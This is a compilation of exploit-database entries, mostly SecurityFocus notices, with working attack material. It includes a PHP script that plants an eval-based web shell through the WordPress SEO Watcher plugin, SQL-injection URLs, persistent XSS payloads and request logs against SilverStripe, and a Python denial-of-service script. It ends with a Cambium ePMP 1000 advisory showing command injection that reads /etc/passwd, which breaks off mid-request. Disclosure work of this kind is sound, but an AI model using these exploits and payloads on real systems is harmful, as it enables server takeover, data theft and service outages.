curl_setopt($handle, CURLOPT_HTTPHEADER, $headers);
curl_setopt($handle, CURLOPT_POSTFIELDS, $data);
curl_setopt($handle, CURLOPT_RETURNTRANSFER, true);
$source = curl_exec($handle);
curl_close($handle);
if(!strpos($source, 'Undefined variable: HTTP_RAW_POST_DATA') &&
@fopen($shell, 'r'))
{
echo " [+] Exploit completed successfully!\n";
echo " ______________________________________________\n\n
{$shell}?cmd=system('id');\n";
}
else
{
die(" [+] Exploit was unsuccessful.\n");
}
?>
source: https://www.securityfocus.com/bid/62825/info
The SEO Watcher plugin for WordPress is prone to an arbitrary PHP code-execution vulnerability.
An attacker can exploit this issue to execute arbitrary PHP code within the context of the web server.
<?php
# seo-watcher ~ Exploit
# http://indonesiancoder.com/
echo <<<EOT
EOT;
$options = getopt('u:f:');
if(!isset($options['u'], $options['f']))
die("\n Usage example: php IDC.php -u http://target.com/ -f shell.php\n
-u http://target.com/ The full path to Joomla!
-f shell.php The name of the file to create.\n");
$url = $options['u'];
$file = $options['f'];
$shell = "{$url}/wp-content/plugins/seo-watcher/ofc/tmp-upload-images/{$file}";
$url = "{$url}/wp-content/plugins/seo-watcher/ofc/php-ofc-library/ofc_upload_image.php?name={$file}";
$data = "<?php eval(\$_GET['cmd']); ?>";
$headers = array('User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:15.0) Gecko/20100101 Firefox/15.0.1',
'Content-Type: text/plain');
echo " [+] Submitting request to: {$options['u']}\n";
$handle = curl_init();
curl_setopt($handle, CURLOPT_URL, $url);
curl_setopt($handle, CURLOPT_HTTPHEADER, $headers);
curl_setopt($handle, CURLOPT_POSTFIELDS, $data);
curl_setopt($handle, CURLOPT_RETURNTRANSFER, true);
$source = curl_exec($handle);
curl_close($handle);
if(!strpos($source, 'Undefined variable: HTTP_RAW_POST_DATA') && @fopen($shell, 'r'))
{
echo " [+] Exploit completed successfully!\n";
echo " ______________________________________________\n\n {$shell}?cmd=system('id');\n";
}
else
{
die(" [+] Exploit was unsuccessful.\n");
}
?>
source: https://www.securityfocus.com/bid/62790/info
Open Source SIEM (OSSIM) is prone to multiple SQL-injection vulnerabilities.
A successful exploit may allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
Open Source SIEM (OSSIM) 4.3.0 and prior are vulnerable.
http://www.example.com/RadarReport/radar-iso27001-potential.php?date_from=%Inject_Here%
http://www.example.com/RadarReport/radar-iso27001-A12IS_acquisition-pot.php?date_from=%Inject_Here%
source: https://www.securityfocus.com/bid/62782/info
SilverStripe is prone to multiple HTML-injection vulnerabilities because it fails to sufficiently sanitize user-supplied input.
Attacker-supplied HTML or JavaScript code could run in the context of the affected site, potentially allowing the attacker to steal cookie-based authentication credentials and control how the site is rendered to the user; other attacks are also possible.
SilverStripe 3.0.5 is vulnerable; other versions may also be affected.
Proof of Concept:
=================
1.1
The first persistent input validation web vulnerability can be exploited
by remote attackers with low privileged application user accounts and
low required user interaction. For demonstration or reproduce ...
PoC: Groups & Rollen (Roles) - Print
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en"
lang="en"><head>
<title>SilverStripe - Sicherheit</title>
<link rel="stylesheet" type="text/css"
href="/framework/css/GridField_print.css?m=1346228458">
</head>
<body onload="window.print();">
<h3>SilverStripe - Sicherheit</h3>
<table>
<thead>
<tr><th>Vorname</th><th>Nachname</th><th>E-Mail</th></tr>
</thead>
<tbody>
</tbody>
</table>
<p>
Gedruckt am 11:44pm, 22/09/2013
<br>
Gedruckt von a%20>"<iframe src="a" onload="alert("BKM")<" a%20=""
a%20<="">>"<iframe src=a onload=alert("BKM")<
</p>
</body>
</html>
</iframe></p></body></html>
POST
http://www.example.com/admin/security/EditForm/field/Groups/item/new/ItemEditForm
Load Flags[LOAD_BYPASS_CACHE LOAD_BACKGROUND ]
Content Size[20] Mime Type[text/html]
Request Headers:
Host[www.example.com]
User-Agent[Mozilla/5.0 (Windows NT 6.1; WOW64; rv:23.0) Gecko/20100101
Firefox/23.0]
Accept[*/*]
Accept-Language[en-US,en;q=0.5]
Accept-Encoding[gzip, deflate]
DNT[1]
Content-Type[application/x-www-form-urlencoded; charset=UTF-8]
X-Pjax[CurrentForm,Breadcrumbs]
X-Requested-With[XMLHttpRequest]
Referer[http://www.example.com/admin/security/EditForm/field/Groups/item/new]
Content-Length[336]
Cookie[__utma=1.1338660565.1379847695.1379847695.1379847695.1;
__utmb=1.8.10.1379847695; __utmc=1;
__utmz=1.1379847695.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=(not%20provided);
PHPSESSID=3cdf3fce42b710fc8e1da69d18cc0dc4; PastMember=1;
cms-panel-collapsed-cms-content-tools-CMSPagesController=true;
cms-panel-collapsed-cms-menu=false;
cms-panel-collapsed-cms-content-tools-ModelAdmin=false;
__utma=1.1551299670.1379847854.1379847854.1379847854.1;
__utmc=1;
__utmz=1.1379847854.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=(not%20provided);
cms-panel-collapsed-cms-content-tools-AssetAdmin=true;
cms-panel-collapsed-cms-content-tools-CMSMain=false;
cms-panel-collapsed-cms-content-tools-CMSPageHistoryController=false]
Connection[keep-alive]
Pragma[no-cache]
Cache-Control[no-cache]
Post Data:
Title[a%2520%3C%2F%3E%3E%22%3Ciframe+src%3Da+onload%3Dalert(%22BKM%22)%3C++++a%2520%3C%2F%3E%3E%22%3Ciframe+src%3Da+onload%3Dalert(%22BKM%22)%3C]
ParentID[]
ID[]
SecurityID[1d6ca7e871bd6ec855f9409e25e030359c5b435f]
action_doSave[1]
BackURL[http%3A%2F%2Fwww.example.com%2Fadmin%2Fsecurity%2FEditForm%2Ffield%2FGroups%2Fitem%2Fnew%2F]
Response Headers:
Server[nginx]
Date[Sun, 22 Sep 2013 11:44:20 GMT]
Content-Type[text/html; charset=utf-8]
Connection[keep-alive]
Expires[Thu, 19 Nov 1981 08:52:00 GMT]
Cache-Control[no-cache, max-age=0, must-revalidate]
Pragma[no-cache]
Set-Cookie[PastMember=1; expires=Sat, 21-Dec-2013 11:44:20 GMT; path=/;
httponly]
X-ControllerURL[admin/security/EditForm/field/Groups/item/4]
X-Pjax[CurrentForm,Breadcrumbs]
X-Controller[SecurityAdmin]
X-Title[SilverStripe - Sicherheit]
X-Include-JS[/assets/_combinedfiles/lib.js?m=1379847629,/framework/thirdparty/tinymce/tiny_mce_gzip.php?m=1346228525&js=1&
plugins=contextmenu%2Ctable%2Cemotions%2Cpaste%2Cspellchecker%2Cmedia%2Cfullscreen
%2Cinlinepopups&themes=advanced&languages=de&diskcache=true&src=false,/assets/_combinedfiles/leftandmain.js?
m=1379847630,/framework/admin/javascript/SecurityAdmin.js?m=1346228457,/framework/javascript/PermissionCheckboxSetField.js?m=1346228484]
X-Include-CSS[/framework/admin/thirdparty/jquery-notice/jquery.notice.css?m=1346228458,/framework/thirdparty/jquery-ui-themes/smoothness/jquery-ui.css?
m=1346228525,/framework/admin/thirdparty/chosen/chosen/chosen.css?m=1346228457,/framework/thirdparty/jstree/themes/apple/style.css?
m=1346228525,/framework/css/TreeDropdownField.css?m=1346228458,/framework/admin/css/screen.css?m=1346228456,/framework/css/GridField.css?m=1346228458]
Vary[Accept-Encoding]
Content-Encoding[gzip]
Content-Length[20]
Status: 200[OK]
GET http://www.example.com/admin/security/EditForm/field/Groups/item/4
Load Flags[LOAD_BACKGROUND ]
Content Size[3966] Mime Type[text/html]
Request Headers:
Host[www.example.com]
User-Agent[Mozilla/5.0 (Windows NT 6.1; WOW64; rv:23.0) Gecko/20100101
Firefox/23.0]
Accept[*/*]
Accept-Language[en-US,en;q=0.5]
Accept-Encoding[gzip, deflate]
DNT[1]
X-Pjax[CurrentForm,Breadcrumbs]
X-Requested-With[XMLHttpRequest]
Referer[http://www.example.com/admin/security/EditForm/field/Groups/item/4]
Cookie[__utma=1.1338660565.1379847695.1379847695.1379847695.1;
__utmb=1.8.10.1379847695; __utmc=1;
__utmz=1.1379847695.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=(not%20provided);
PHPSESSID=3cdf3fce42b710fc8e1da69d18cc0dc4; PastMember=1;
cms-panel-collapsed-cms-content-tools-CMSPagesController=true;
cms-panel-collapsed-cms-menu=false;
cms-panel-collapsed-cms-content-tools-ModelAdmin=false;
__utma=1.1551299670.1379847854.1379847854.1379847854.1; __utmc=1;
__utmz=1.1379847854.1.1.utmcsr=google|utmccn=(organic)|utmcmd=
organic|utmctr=(not%20provided);
cms-panel-collapsed-cms-content-tools-AssetAdmin=true;
cms-panel-collapsed-cms-content-tools-CMSMain=false;
cms-panel-collapsed-cms-content-tools-CMSPageHistoryController=false]
Connection[keep-alive]
Response Headers:
Server[nginx]
Date[Sun, 22 Sep 2013 11:44:21 GMT]
Content-Type[text/html; charset=utf-8]
Connection[keep-alive]
Expires[Thu, 19 Nov 1981 08:52:00 GMT]
Cache-Control[no-cache, max-age=0, must-revalidate]
Pragma[no-cache]
Set-Cookie[PastMember=1; expires=Sat, 21-Dec-2013 11:44:21 GMT; path=/;
httponly]
X-Controller[SecurityAdmin]
X-Title[SilverStripe - Sicherheit]
X-Include-JS[/assets/_combinedfiles/lib.js?m=1379847629,/framework/thirdparty/tinymce/tiny_mce_gzip.php?m=1346228525&js=1&
plugins=contextmenu%2Ctable%2Cemotions%2Cpaste%2Cspellchecker%2Cmedia%2Cfullscreen
%2Cinlinepopups&themes=advanced&languages=de&diskcache=true&src=false,/assets/_combinedfiles/leftandmain.js?
m=1379847630,/framework/admin/javascript/SecurityAdmin.js?m=1346228457,/framework/javascript/PermissionCheckboxSetField.js?m=1346228484]
X-Include-CSS[/framework/admin/thirdparty/jquery-notice/jquery.notice.css?m=
1346228458,/framework/thirdparty/jquery-ui-themes/smoothness/jquery-ui.css?m=1346228525,/framework/admin/thirdparty/chosen/chosen/chosen.css?
m=1346228457,/framework/thirdparty/jstree/themes/apple/style.css?m=1346228525,/framework/css/TreeDropdownField.css?m=1346228458,
/framework/admin/css/screen.css?m=1346228456,/framework/css/GridField.css?m=1346228458,/framework/css/CheckboxSetField.css?m=1346228458]
Vary[Accept-Encoding]
Content-Encoding[gzip]
Content-Length[3966]
Status: 200[OK]
GET
http://www.example.com/admin/security/EditForm/field/Groups/item/4/ItemEditForm/
field/Members?Title=a%2520%3C%2F%3E%3E%22%3Ciframe+src%3Da+onload%3Dalert
(%22BKM%22)%3C++++a%252&ParentID=&gridfield_relationsearch=&Members%5B
GridState%5D=%7B%22GridFieldAddRelation%22%3A%5B%5D%2C%22GridFieldSortableHeader%22%3A%7B%22SortColumn%22%3A%5B%5D%7D%2C%22
GridFieldFilterHeader%22%3A%7B%22Columns%22%3A%5B%5D%7D%2C%22GridFieldPaginator%22%3A%7B%22currentPage%22%3A1%7D%2C%22
GridFieldSearchRelation%22%3A%5B%5D%7D&filter%5BFirstName%5D=&filter%5BSurname%5D=&filter%5BEmail
%5D=&ID=4&SecurityID=1d6ca7e871bd6ec855f9409e25e030359c5b435f&action_gridFieldAlterAction%3FStateID%3D523ed8157c4b68_95954854=Drucken
<==
Load Flags[LOAD_DOCUMENT_URI LOAD_INITIAL_DOCUMENT_URI ]
Content Size[378]
Mime Type[text/html]
Request Headers:
Host[www.example.com]
User-Agent[Mozilla/5.0 (Windows NT 6.1; WOW64; rv:23.0) Gecko/20100101
Firefox/23.0]
Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8]
Accept-Language[en-US,en;q=0.5]
Accept-Encoding[gzip, deflate]
DNT[1]
Referer[http://www.example.com/admin/security/EditForm/field/Groups/item/4]
Cookie[__utma=1.1338660565.1379847695.1379847695.1379847695.1;
__utmb=1.8.10.1379847695; __utmc=1;
__utmz=1.1379847695.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=(not%20provided);
PHPSESSID=3cdf3fce42b710fc8e1da69d18cc0dc4; PastMember=1; cms-panel-
collapsed-cms-content-tools-CMSPagesController=true;
cms-panel-collapsed-cms-menu=false;
cms-panel-collapsed-cms-content-tools-ModelAdmin=false;
__utma=1.1551299670.1379847854.1379847854.1379847854.1;
__utmc=1;
__utmz=1.1379847854.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=(not%20provided);
cms-panel-collapsed-cms-content-tools-AssetAdmin=true;
cms-panel-collapsed-cms-content-tools-CMSMain=false;
cms-panel-collapsed-cms-content-tools-CMSPageHistoryController=false]
Connection[keep-alive]
Response Headers:
Server[nginx]
Date[Sun, 22 Sep 2013 11:44:26 GMT]
Content-Type[text/html; charset=utf-8]
Connection[keep-alive]
Expires[Thu, 19 Nov 1981 08:52:00 GMT]
Cache-Control[no-cache, max-age=0, must-revalidate]
Pragma[no-cache]
Set-Cookie[PastMember=1; expires=Sat, 21-Dec-2013 11:44:26 GMT; path=/;
httponly]
X-Controller[SecurityAdmin]
X-Title[SilverStripe - Sicherheit]
Vary[Accept-Encoding]
Content-Encoding[gzip]
Content-Length[378]
Status: 200[OK]
GET
http://www.example.com/admin/security/EditForm/field/Groups/item/4/ItemEditForm/field/[PERSISTENT
INJECTED SCRIPT CODE AS PATH!]
Load Flags[LOAD_DOCUMENT_URI ]
Content Size[20]
Mime Type[text/html]
Request Headers:
Host[www.example.com]
User-Agent[Mozilla/5.0 (Windows NT 6.1; WOW64; rv:23.0) Gecko/20100101
Firefox/23.0]
Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8]
Accept-Language[en-US,en;q=0.5]
Accept-Encoding[gzip, deflate]
DNT[1]
Referer[http://www.example.com/admin/security/EditForm/field/Groups/item/4/ItemEditForm/field/
Members?Title=a%2520%3C%2F%3E%3E%22%3Ciframe+src%3Da+onload
%3Dalert(%22BKM%22)%3C++++a%252&ParentID=&gridfield_relationsearch=&Members%5B
GridState%5D=%7B%22GridFieldAddRelation%22%3A%5B%5D%2C%22GridFieldSortableHeader%22%3A%7B%22SortColumn%22%3A%5B%5D%7D%2C%22
GridFieldFilterHeader%22%3A%7B%22Columns%22%3A%5B%5D%7D%2C%22GridFieldPaginator%22%3A%7B%22currentPage%22%3A1%7D%2C%22
GridFieldSearchRelation%22%3A%5B%5D%7D&filter%5BFirstName%5D=&filter%5BSurname%5D=&filter%5BEmai%5D=&ID=4&
SecurityID=1d6ca7e871bd6ec855f9409e25e030359c5b435f&action_gridFieldAlterAction%3FStateID%3D523ed8157c4b68_95954854=Drucken]
Cookie[__utma=1.1338660565.1379847695.1379847695.1379847695.1;
__utmb=1.8.10.1379847695; __utmc=1;
__utmz=1.1379847695.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=(not%20provided);
PHPSESSID=3cdf3fce42b710fc8e1da69d18cc0dc4;
PastMember=1;
cms-panel-collapsed-cms-content-tools-CMSPagesController=true;
cms-panel-collapsed-cms-menu=false;
cms-panel-collapsed-cms-content-tools-ModelAdmin=false;
__utma=1.1551299670.1379847854.1379847854.1379847854.1; __utmc=1;
__utmz=1.1379847854.1.1.utmcsr=google|
utmccn=(organic)|utmcmd=organic|utmctr=(not%20provided);
cms-panel-collapsed-cms-content-tools-AssetAdmin=true;
cms-panel-collapsed-cms-content-tools-CMSMain=false;
cms-panel-collapsed-cms-content-tools-CMSPageHistoryController=false]
Connection[keep-alive]
Response Headers:
Server[nginx]
Date[Sun, 22 Sep 2013 11:44:27 GMT]
Content-Type[text/html; charset=utf-8]
Connection[keep-alive]
Expires[Thu, 19 Nov 1981 08:52:00 GMT]
Cache-Control[no-cache, max-age=0, must-revalidate]
Pragma[no-cache]
Set-Cookie[PastMember=1; expires=Sat, 21-Dec-2013 11:44:27 GMT; path=/;
httponly]
X-Controller[SecurityAdmin]
X-Title[SilverStripe - Sicherheit]
Vary[Accept-Encoding]
Content-Encoding[gzip]
Content-Length[20]
PoC: (Client-Side Link)
http://www.example.com/admin/security/EditForm/field/Groups/item/4/ItemEditForm/field/Members
?Title=a%25[PERSISTENT INJECTED SCRIPT
CODE!]%3C++++a%252&ParentID=&gridfield_relationsearch=&
Members%5BGridState%5D=%7B%22GridFieldAddRelation%22%3A%5B%5D%2C%22GridFieldSortableHeader%22%3A%7B%22SortColumn%22%3A%5B%5D%7D%2
C%22GridFieldFilterHeader%22%3A%7B%22Columns%22%3A%5B%5D%7D%2C%22GridFieldPaginator%22%3A%7B%22
currentPage%22%3A1%7D%2C%22GridFieldSearchRelation%22%3A%5B%5D%7D&filter%5BFirstName%5D=&filter%5BSurname%5D=&filter%5BEmail
%5D=&ID=4&SecurityID=1d6ca7e871bd6ec855f9409e25e030359c5b435f&action_gridFieldAlterAction%3FStateID%3D523ed8157c4b68_95954854=Drucken
Reference(s):
http://ss3.demo.silverstripe.org/admin/security/show/root#Root_Roles
http://ss3.demo.silverstripe.org/admin/security/EditForm/field/Groups/item/1/edit
http://www.example.com/admin/security/EditForm/field/Roles/item/new
http://www.example.com/admin/security/EditForm/field/Groups/item/new/ItemEditForm
http://www.example.com/admin/security/EditForm/field/Groups/item/4
http://www.example.com/admin/security/EditForm/field/Groups/item/4/ItemEditForm/field/x
1.2
The secound persistent input validation web vulnerability and filter
bypass vulnerability can be exploited by remote attackers
with low privileged application user accounts with low required user
interaction. For demonstration or reproduce ...
PoC: Model Admin > Add Company > Edit Company
<span class="message validation">'>"<[PERSISTENT INJECTED SCRIPT
CODE!]>' ist kein numerischer Wert,
nur nummerische Werte sind in diesem Feld erlaubt</span>
</div>
<div id="CEO" class="field text">
<label class="left" for="Form_ItemEditForm_CEO">CEO</label>
<div class="middleColumn">
<input type="text" name="CEO" value=">"<[PERSISTENT INJECTED SCRIPT
CODE!])</script>" class="text" id="Form_ItemEditForm_CEO" />
</div>
Note: The vulnerability is located in the message validation filter
exception-handling.
--- PoC Session Request Logs ---
Status: 200[OK]
POST
http://www.example.com/admin/test/Company/EditForm/field/Company/item/new/ItemEditForm
Load Flags[LOAD_BYPASS_CACHE LOAD_BACKGROUND ]
Content Size[1309]
Mime Type[text/html]
Request Headers:
Host[www.example.com]
User-Agent[Mozilla/5.0 (Windows NT 6.1; WOW64; rv:23.0) Gecko/20100101
Firefox/23.0]
Accept[*/*]
Accept-Language[en-US,en;q=0.5]
Accept-Encoding[gzip, deflate]
DNT[1]
Content-Type[application/x-www-form-urlencoded; charset=UTF-8]
X-Pjax[CurrentForm,Breadcrumbs]
X-Requested-With[XMLHttpRequest]
Referer[http://www.example.com/admin/test/Company/EditForm/field/Company/item/new?q[Name]=&q[Category]=&q[Revenue]=&q[CEO]=]
Content-Length[560]
Cookie[__utma=1.1338660565.1379847695.1379847695.1379847695.1;
__utmb=1.7.10.1379847695; __utmc=1;
__utmz=1.1379847695.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=(not%20provided);
PHPSESSID=3cdf3fce42b710fc8e1da69d18cc0dc4; PastMember=1;
cms-panel-collapsed-cms-content-tools-CMSPagesController=true;
cms-panel-collapsed-cms-menu=false;
cms-panel-collapsed-cms-content-tools-ModelAdmin=false;
__utma=1.1551299670.1379847854.1379847854.1379847854.1;
__utmb=1.5.10.1379847854; __utmc=1;
__utmz=1.1379847854.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=(not%20provided)]
Connection[keep-alive]
Pragma[no-cache]
Cache-Control[no-cache]
Post Data:
Name[Evolution+Security]
Category[TEST+PP]
Revenue[%3E%22%3Ciframe+src%3Dhttp%3A%2F%2Fvuln-lab.com%3E%3Cscript+alert(document.cookie)%3C%2Fscript%3E]
<= [PERSISTENT INJECTED TEST CODES!]
CEO[%3E%22%3Ciframe+src%3Dhttp%3A%2F%2Fvuln-lab.com%3E%3Cscript+alert(document.cookie)%3C%2Fscript%3E]
RelationFieldsTestPageID[]
GridFieldTestPageHasOneID[]
SecurityID[1d6ca7e871bd6ec855f9409e25e030359c5b435f]
action_doSave[1]
BackURL
[http%3A%2F%2Fwww.example.com%2Fadmin%2Ftest%2FCompany%2FEditForm%2Ffield%2FCompany%2Fitem%2F
new%3Fq%5BName%5D%3D%26q%5BCategory%5D%3D%26q%5BRevenue%5D%3D%26q%5BCEO%5D%3D%2F]
Response Headers:
Server[nginx]
Date[Sun, 22 Sep 2013 11:20:33 GMT]
Content-Type[text/html]
Connection[keep-alive]
Expires[Thu, 19 Nov 1981 08:52:00 GMT]
Cache-Control[no-cache, max-age=0, must-revalidate]
Pragma[no-cache]
Set-Cookie[PastMember=1; expires=Sat, 21-Dec-2013 11:20:32 GMT; path=/;
httponly]
X-Controller[TestModelAdmin]
X-Title[SilverStripe - Test ModelAdmin]
X-Include-JS[/assets/_combinedfiles/lib.js?m=1379847629,/framework/thirdparty/tinymce/tiny_mce_gzip.php?m=1346228525&js=1&
plugins=contextmenu%2Ctable%2Cemotions%2Cpaste%2Cspellchecker%2Cmedia%2Cfullscreen
%2Cinlinepopups&themes=advanced&languages=de&diskcache=true&src=false,/assets/_combinedfiles/leftandmain.js?
m=1379847630,/framework/admin/javascript/ModelAdmin.js?m=1346228457]
X-Include-CSS[/framework/admin/thirdparty/jquery-notice/jquery.notice.css?m=1346228458,
/framework/thirdparty/jquery-ui-themes/smoothness/jquery-ui.css?m=1346228525,/framework/admin/thirdparty/chosen/chosen/chosen.css?
m=1346228457,/framework/thirdparty/jstree/themes/apple/style.css?m=1346228525,/framework/css/TreeDropdownField.css?m=1346228458,
/framework/admin/css/screen.css?m=1346228456,/framework/css/GridField.css?m=1346228458]
Vary[Accept-Encoding]
Content-Encoding[gzip]
Content-Length[1309]
'''
source: https://www.securityfocus.com/bid/62723/info
Abuse HTTP Server is prone to a remote denial-of-service vulnerability.
Attackers can exploit this issue to cause denial-of-service conditions.
Abuse HTTP Server version 2.08 is vulnerable; other versions may also be affected.
'''
#!/usr/bin/python
import socket
import os
import sys
crash = "0" * 504
buffer="GET / HTTP/1.1\r\n"
buffer+="Host: " + crash + "\r\n"
buffer+="Content-Type: application/x-www-form-urlencoded\r\n"
buffer+="User-Agent: Mozilla/5.0 (X11; Linux i686; rv:14.0) Gecko/20100101 Firefox/14.0.1\r\n"
buffer+="Content-Length : 1048580\r\n\r\n"
print "[*] Exploit c0ded by Zee Eichel - zee[at]cr0security.com"
print "[*] Change some option in code with your self"
print "[*] Connect to host and send payload"
expl = socket.socket ( socket.AF_INET, socket.SOCK_STREAM )
expl.connect(("192.168.1.101", 80))
expl.send(buffer)
print "[*] Server Disconected"
expl.close()
source: https://www.securityfocus.com/bid/62647/info
Blue Coat ProxySG and Security Gateway OS are prone to a denial-of-service vulnerability.
Successful exploits may allow an attacker to consume excessive resources, denying service to legitimate users.
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/thc-ssl-dos-1.4.tar.gz
source: https://www.securityfocus.com/bid/62610/info
The JVideoClip component for Joomla! is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
JVideoClip 1.5.1 is vulnerable; other versions may also be affected.
http://www.example/index.php?option=com_jvideoclip&view=search&type=user&uid=[SQLi]&Itemid=6
*July 14, 2015: *First contacted Cambium
*July 14, 2015: *Initial vendor response
*July 16, 2015: *Vuln Details reported to Cambium
*July 31, 2015:* Followup on advisory and fix timelines
*August 03, 2015: *Vendor gives mid-Aug as fix (v2.5) release
timeline. Ceases communication.
*Nov 19, 2015: *Releasing vulnerability details & poc
*Versions affected*: < v2.5
.....
*CVE-IDs* - To be assigned.
.....
*Background *
http://www.cambiumnetworks.com/products/access/epmp-1000/
ePMP™ 1000
Wireless service providers and enterprises need reliable, high-quality
broadband connectivity that can be rapidly deployed and expanded. The
ePMP platform provides stable coverage across large service areas and
enhances your existing infrastructure.
*Deployed by:*
ION Telecom
Kayse Wireless
Vanilla Telecom
Traeger Park
EszakNet
Edera
Videon
COMeSER
Seattle, WA
Budapest Video Surveillance
Desktop
Silo Wireless
Rocket Broadband
Snavely Forest Products
KRK Sistemi
KAJA Komputer
Root Media
*Vulnerability Details*
*From Cambium Networks ePMP 1000 user / configuration guide:
*
ePMP 1000 has four (4) users -
- ADMINISTRATOR, who has full read and write permissions.
- INSTALLER, who has permissions to read and write parameters
applicable to unit installation and monitoring.
- HOME, who has permissions only to access pertinent information for
support purposes
- READONLY, who only has permissions to view the Monitor page.
.....
1. *OS Command Injection *
'admin' and 'installer' users have access to perform Ping and
Traceroute functions via GUI. No other user has this access.
Ping function accepts destination IP address value via 'ping_ip
parameter and uses three (3) other parameters - packets_num, buf_size
and ttl, to perform Ping.
Traceroute function accepts destination IP address via 'traceroute_ip'
parameter.
The application does not perform strict input validation for all these
parameters - ping_ip', packets_num, buf_size and ttl for Ping
function; and traceroute_ip for Traceroute function.
This allows an authenticated user - 'admin' or non-admin,
low-privileged 'installer' & ‘home’ users - to be able to inject
arbitrary system commands that gets executed by the host.
.....
*PING PoC *
.....
HTTP Request
.....
POST /cgi-bin/luci/;stok=<stok_value>/admin/ping HTTP/1.1
Host: <IP_address>
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:38.0)
Gecko/20100101 Firefox/38.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Referer: http://<IP_address>/
Cookie: sysauth=<sysauth_value>;
globalParams=%7B%22dashboard%22%3A%7B%22refresh_rate%22%3A%225%22%7D%2C%22installer%22%3A%7B%22refresh_rate%22%3A%225%22%7D%7D;
userType=Installer; usernameType=installer; stok=<stok_value>
DNT: 1
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache
ping_ip=8.8.8.8|cat%20/etc/passwd%20||&packets_num=1&buf_size=1&ttl=1&debug=0
[
*or*
ping_ip=8.8.8.8&packets_num=1|cat%20/etc/passwd%20||&buf_size=1&ttl=1&debug=0
*or*
ping_ip=8.8.8.8&packets_num=1&buf_size=1|cat%20/etc/passwd%20||&ttl=1&debug=0
*or*
ping_ip=8.8.8.8&packets_num=1&buf_size=1&ttl=1|cat%20/etc/passwd%20||&debug=0
]
.....
HTTP Response
.....
HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, max-age=0, must-revalidate,
post-check=0, pre-check=0
Cache-Control: no-cache
Status: 200 OK
Content-Type: text/plain
Expires: 0
Date: Sun, 18 Jan 1970 14:45:37 GMT
Server: Cambium HTTP Server
daemon:*:1:1:daemon:/var:/bin/false
ftp:*:55:55:ftp:/home/ftp:/bin/false
network:*:101:101:network:/var:/bin/false
admin:<password_hash>:1000:4:admin:/tmp:/usr/bin/clish
installer:<password_hash>:2000:100:installer:/tmp:/bin/false
home:<password_hash>:3000:100:home:/tmp:/bin/false
readonly:<password_hash>:4000:100:readonly:/tmp:/bin/false
dashboard:<password_hash>:5000:100:dashboard:/tmp:/bin/false
nobody:*:65534:65534:nobody:/var:/bin/false
root:<password_hash>:0:0:root:/root:/bin/ash
.....
*traceroute - PoC
*
.....
HTTP Request
.....
POST /cgi-bin/luci/;stok=<stok_value>/admin/traceroute HTTP/1.1
Host: <IP_address>
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:38.0)
Gecko/20100101 Firefox/38.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Referer: http://<IP_address>/
Cookie: sysauth=<sysauth_value>;
globalParams=%7B%22dashboard%22%3A%7B%22refresh_rate%22%3A%225%22%7D%2C%22installer%22%3A%7B%22refresh_rate%22%3A%225%22%7D%7D;
userType=Installer; usernameType=installer; stok=<stok_value>
DNT: 1
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache
traceroute_ip=8.8.8.8|cat%20/etc/passwd%20||&fragm=0&trace_method=icmp_echo&display_ttl=0&verbose=0&debug=0
.....
HTTP Response
.....
HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, max-age=0, must-revalidate,
post-check=0, pre-check=0
Cache-Control: no-cache
Status: 200 OK
Content-Type: text/plain
Expires: 0
Date: Sun, 18 Jan 1970 16:09:26 GMT
Server: Cambium HTTP Server
daemon:*:1:1:daemon:/var:/bin/false
ftp:*:55:55:ftp:/home/ftp:/bin/false
network:*:101:101:network:/var:/bin/false
admin:<password_hash>:1000:4:admin:/tmp:/usr/bin/clish
installer:<password_hash>:2000:100:installer:/tmp:/bin/false
home:<password_hash>:3000:100:home:/tmp:/bin/false
readonly:<password_hash>:4000:100:readonly:/tmp:/bin/false
dashboard:<password_hash>:5000:100:dashboard:/tmp:/bin/false
nobody:*:65534:65534:nobody:/var:/bin/false
root:<password_hash>:0:0:root:/root:/bin/ash
.....
2. *Weak Authorization Controls + privilege escalation*
'home' and 'readonly' users do not have access to Ping and Traceroute
functions via management portal. However, the application lacks strict
authorization controls, and we can still perform both these functions
by sending corresponding HTTP(S) requests directly, when logged in as
low-privileged, 'home' user.
When we combine this flaw with above described OS Command Injection
affecting ping and traceroute, it is possible for non-admin,
low-privileged, ‘home’ user to execute system level commands via
'ping' and 'traceroute' functions and dump password hashes easily and
/ or perform any system level functions.
*Note*: ‘readonly’ user cannot perform this. Only ‘home’ user can
exploit these.
.....
*Steps to attack -
*
a login as home user
b craft & send HTTP request for ping and traceroute functions
.....
Login - HTTP Request
..
POST /cgi-bin/luci HTTP/1.1
Host: <IP_address>
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:38.0)
Gecko/20100101 Firefox/38.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
